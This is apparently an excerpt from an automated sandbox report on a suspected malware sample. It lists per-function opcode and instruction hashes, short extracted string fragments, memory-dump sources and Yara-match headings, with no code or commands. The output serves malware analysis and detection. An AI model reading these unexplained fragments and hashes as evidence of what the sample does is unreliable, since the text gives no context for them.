                                                                                                                                                                                                                                                        • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                        • Instruction ID: 720b96add61f48b1b47b5c158fca18041c49100f478495a8c7c022762aa19806
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE42177550C3918FD721CF24C840A6EBBE1BF92314F188A6CE8E95B392D73AD905CB56
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0u4w$_q$qr$xy
                                                                                                                                                                                                                                                        • API String ID: 0-1225007230
                                                                                                                                                                                                                                                        • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                        • Instruction ID: 0823e46cbf7034a124ba1dd62f8fe3ea8d572e3a30188e3aed6df063fca81eb1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E191D1B1A08311CBC724CF58C89276BB7F1EF95324F18996CE8CA8B391E7789905C756
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                        • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                        • Instruction ID: 4b7d95f150c1204aca9568637bf4e0cca31d958964639a836a43443006162250
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C915D71A0C3D08FE3358B3984517ABBBD29FD3315F19896DD8D99B382C6B94809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction ID: 101dabf25a0a494e7b668ffbb401c3c8fb11e40dafbb144ac0692bfa825f37a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE915C71A0C3D08FE3358B3584517ABBBD29FD3315F18896DC8D99B782CAB94809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction ID: dceea04e144445077fcf7f242adccfdfe8ef9f13d4949891ea6f53c6b8cde413
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA916E71A083D08FE3358B3984517EBBBD29FE3315F18895DD8D99B782C6794809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction ID: 7ae1a73dd4e4753b2928b4659c9b54f8291e04f60f5df2e041617017ab7ae1cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A816A729083D08FE335CF3588517ABBBD2AFE3305F18895DC8C95B682C6794809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                        • API String ID: 0-149357369
                                                                                                                                                                                                                                                        • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                        • Instruction ID: 8c3c4d83ac39eb0b40010bdbbfff0587a1052f2449081dc979a663940944afc9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9218BB55193809BC314CF66884161BFBE2BBD2705F25992DF0C85B255D7B48906CF8B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: ,$i$r}A
                                                                                                                                                                                                                                                        • API String ID: 2994545307-2114006112
                                                                                                                                                                                                                                                        • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                        • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfff$i$r}A
                                                                                                                                                                                                                                                        • API String ID: 0-3931832132
                                                                                                                                                                                                                                                        • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                        • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                        • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                        • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                        • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                        • Instruction ID: 93ef230720344acf8da617301085d1b9285f669a26e567fd11633f10e9a57783
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2C13B72A043018BD7249F24C8526ABB3E1EFD6315F19852DED9697342E7BC9D0AC392
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                        • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                        • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                        • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                        • Instruction ID: 522bdb4bbef70785227e5f0632603bd50798a6816371f31868b372b086f65a60
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C10FB69083518BC720CF28C88166BB3F2FF95314F19895CE8D58B390E779AD05CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #XXL$=$BC
                                                                                                                                                                                                                                                        • API String ID: 0-2546488661
                                                                                                                                                                                                                                                        • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                        • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: 1234$oQ3$sQ3
                                                                                                                                                                                                                                                        • API String ID: 2994545307-3057079318
                                                                                                                                                                                                                                                        • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                        • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 12347$oQ3$sQ3
                                                                                                                                                                                                                                                        • API String ID: 0-1755585375
                                                                                                                                                                                                                                                        • Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                        • Instruction ID: d38361e1daffc89315ceec1f672a606886a28696da5ebf4a2438546b3223ad54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFB13372A083518BC728CE28D89096BB7E2EB95300F19853CED9797255D735AD01CB82
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                        • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                        • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                        • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                        • Instruction ID: 9cbcb5ce71e577d69acf885f1bfd9260fbb84fbc9d6754ea0596745cf7322951
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52B1043151D3D08ED7398F3994907ABBBE0AFA7305F04499CD4D95B282D779860ACB63
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                        • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                        • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
